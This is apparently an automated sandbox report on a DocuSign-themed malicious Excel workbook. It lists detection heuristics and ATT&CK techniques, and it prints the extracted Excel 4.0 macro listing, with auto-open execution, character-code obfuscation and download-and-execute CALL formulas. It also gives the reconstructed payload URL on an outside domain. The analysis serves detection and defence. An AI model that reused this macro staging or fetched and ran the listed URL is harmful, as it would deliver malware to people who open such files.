MALICIOUS
302
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic for Applications
T1204.002 Malicious File
The file contains Excel 4.0 (XLM) macros, specifically an Auto_Open function that utilizes dangerous APIs like RUN and ShellExecute. This indicates the macro is designed to execute arbitrary commands. The embedded URL likely points to a malicious payload that the macro attempts to download and run. The ClamAV detection name 'Doc.Downloader.Docusign0521-9864805-0' further supports the downloader functionality.
Heuristics 7
-
ClamAV: Doc.Downloader.Docusign0521-9864805-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Docusign0521-9864805-0
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
URL reconstructed from XLM cell array (1 URL) critical OLE_XLM_CELL_ARRAY_URLExcel 4.0 macro sheet stages its payload URL across the BIFF8 Shared String Table (one quoted-char SST entry concatenated with & at runtime), across individual numeric cells (one ASCII charcode per cell), or split across multi-char fragment cells a download formula concatenates by reference (=A1&A2&… / CONCATENATE(...)). The reconstructed URL is invisible to literal-bytes URL extraction because it is never contiguous in the workbook stream. URLs were recovered by walking the BIFF8 record stream and decoding SST entries, LABELSST/RK/NUMBER cells, and FORMULA cell-reference concatenation in token order.
-
Reference to ShellExecute API high SC_STR_SHELLEXECReference to ShellExecute API
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://dashboard.imadeit.com.ng/ds/151120.gif� Referenced by macro
- https://dashboard.imadeit.com.ng/ds/151120.gifReferenced by macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt4d5531650e0faf8764ddd7b14e6947143c32308cbf699d36f8845764b3b4560a |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 5603 bytes |
Preview scriptFirst 1,000 lines of the extracted script
' 0085 16 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - DocuSig
' 0085 18 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - 8
' 0085 18 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - 8
' 0085 18 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - 8
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d DocuSig!A50
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
' 8 ,A94,RUN(B104),""
' 8 ,B104,RUN(A203),""
' 8 ,B200,"https://"&C201&D202&E203,""
' 8 ,A203,"CALL("K"& 8 !CC261,"C"& 8 !R134,"JCJ", 8 !BH172,0)",""
' 8 ,A204,"CALL("K"& 8 !CJ205,"C"& 8 !R168,"JCJ", 8 !BH172& 8 !BH187,0)",""
' 8 ,A205,"CALL("U"& 8 !CJ233,"U"& 8 !BO262,"JJCCJJ",0,B200, 8 !BH172& 8 !BH187& 8 !BH201,0,0)",""
' 8 ,A206,"CALL( 8 !X152, 8 !X165,"JJCCCCJ",0, 8 !BX227, 8 !BH172& 8 !BH187& 8 !BH201,,0,0)",""
' 8 ,A207,HALT(),""
' 8 ,EA233,"CONCATENATE(EA235,EA236,EA237,EA238,EA239,EA240,EA241,EA242,EA243,EA244,EA245,EA246,EA247,EA248,EA249)",""
' 8 ,EA234,[],""
' 8 ,EA235,[],""
' 8 ,EA236,[],""
' 8 ,EA237,[],""
' 8 ,EA238,[],""
' 8 ,EA239,[],""
' 8 ,EA240,[],""
' 8 ,EA241,[],""
' 8 ,EA242,[],""
' 8 ,EA243,[],""
' 8 ,EA244,[],""
' 8 ,EA245,[],""
' 8 ,EA246,[],""
' 8 ,EA247,[],""
' 8 ,EA248,[],""
' 8 ,EA249,[],""
' 8 ,EG251,CONCATENATE(EG252&EG253&EG254&EG255&EG256&EG257&EG258),""
' 8 ,EG252,CHAR(EH252+EI252+EJ252),""
' 8 ,EG253,CHAR(EH253+EI253+EJ253),""
' 8 ,EG254,CHAR(EH254+EI254+EJ254),""
' 8 ,EG255,CHAR(EH255+EI255+EJ255),""
' 8 ,EG256,CHAR(EH256-EI256-EJ256),""
' 8 ,EG257,CHAR(EH257-EI257-EJ257),""
' 8 ,EG258,CHAR(EH258-EI258-EJ258),""
' 8 ,EG264,CONCATENATE(EG265&EG266&EG267&EG268&EG269&EG270&EG271&EG272&EG273&EG274&EG275&EG276&EG277),""
' 8 ,EG265,CHAR(EH265+EI265+EJ265),""
' 8 ,EG266,CHAR(EH266+EI266+EJ266),""
' 8 ,EA267,"CONCATENATE(EA269,EA270,EA271,EA272,EA273,EA274,EA275,EA276,EA277,EA278,EA279,EA280,EA281,EA282,EA283)",""
' 8 ,EG267,CHAR(EH267+EI267+EJ267),""
' 8 ,EA268,CHAR(EB268+EC268+ED268),""
' 8 ,EG268,CHAR(EH268-EI268-EJ268),""
' 8 ,EA269,CHAR(EB269+EC269+ED269),""
' 8 ,EG269,CHAR(EH269-EI269-EJ269),""
' 8 ,EA270,CHAR(EB270+EC270+ED270),""
' 8 ,EG270,CHAR(EH270-EI270-EJ270),""
' 8 ,EA271,CHAR(EB271+EC271+ED271),""
' 8 ,EG271,CHAR(EH271-EI271-EJ271),""
' 8 ,EQ271,"CONCATENATE(EQ272,EQ273,EQ274,EQ275,EQ276,EQ277,EQ278,EQ279,EQ280)",""
' 8 ,EA272,CHAR(EB272-EC272-ED272),""
' 8 ,EG272,CHAR(EH272-EI272+EJ272),""
' 8 ,EQ272,CHAR(ER272+ES272+ET272),""
' 8 ,EA273,CHAR(EB273-EC273-ED273),""
' 8 ,EG273,CHAR(EH273-EI273+EJ273),""
' 8 ,EQ273,CHAR(ER273+ES273+ET273),""
' 8 ,EA274,CHAR(EB274-EC274-ED274),""
' 8 ,EG274,CHAR(EH274-EI274+EJ274),""
' 8 ,EQ274,CHAR(ER274+ES274+ET274),""
' 8 ,EA275,CHAR(EB275-EC275-ED275),""
' 8 ,EG275,CHAR(EH275+EI275-EJ275),""
' 8 ,EQ275,CHAR(ER275+ES275-ET275),""
' 8 ,EA276,CHAR(EB276+EC276-ED276),""
' 8 ,EG276,CHAR(EH276+EI276-EJ276),""
' 8 ,EQ276,CHAR(ER276+ES276-ET276),""
' 8 ,EA277,CHAR(EB277+EC277-ED277),""
' 8 ,EG277,CHAR(EH277+EI277-EJ277),""
' 8 ,EQ277,CHAR(ER277+ES277-ET277),""
' 8 ,EA278,CHAR(EB278+EC278-ED278),""
' 8 ,EQ278,CHAR(ER278-ES278+ET278),""
' 8 ,EA279,CHAR(EB279+EC279-ED279),""
' 8 ,EQ279,CHAR(ER279-ES279+ET279),""
' 8 ,EA280,CHAR(EB280-EC280+ED280),""
' 8 ,EQ280,CHAR(ER280-ES280+ET280),""
' 8 ,EA281,CHAR(EB281-EC281+ED281),""
' 8 ,EA282,CHAR(EB282-EC282+ED282),""
' 8 ,EA283,CHAR(EB283-EC283+ED283),""
' 8 ,EQ286,"CONCATENATE(EQ287,EQ288,EQ289,EQ290,EQ291,EQ292,EQ293)",""
' 8 ,EQ287,CHAR(ER287-ES287-ET287),""
' 8 ,EQ288,CHAR(ER288-ES288-ET288),""
' 8 ,EQ289,CHAR(ER289-ES289-ET289),""
' 8 ,EQ290,CHAR(ER290-ES290+ET290),""
' 8 ,EQ291,CHAR(ER291-ES291+ET291),""
' 8 ,EQ292,CHAR(ER292-ES292+ET292),""
' 8 ,EQ293,CHAR(ER293-ES293+ET293),""
' 8 ,EQ300,"CONCATENATE(EQ301,EQ302,EQ303,EQ304,EQ305,EQ306,EQ307,EQ308,EQ309,EQ310,EQ311,EQ312,EQ313)",""
' 8 ,EQ301,[],""
' 8 ,EQ302,[],""
' 8 ,EQ303,[],""
' 8 ,EQ304,[],""
' 8 ,EQ305,[],""
' 8 ,EQ306,[],""
' 8 ,EQ307,[],""
' 8 ,EQ308,[],""
' 8 ,EQ309,[],""
' 8 ,EQ310,[],""
' 8 ,EQ311,[],""
' 8 ,EQ312,[],""
' 8 ,EQ313,[],""
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.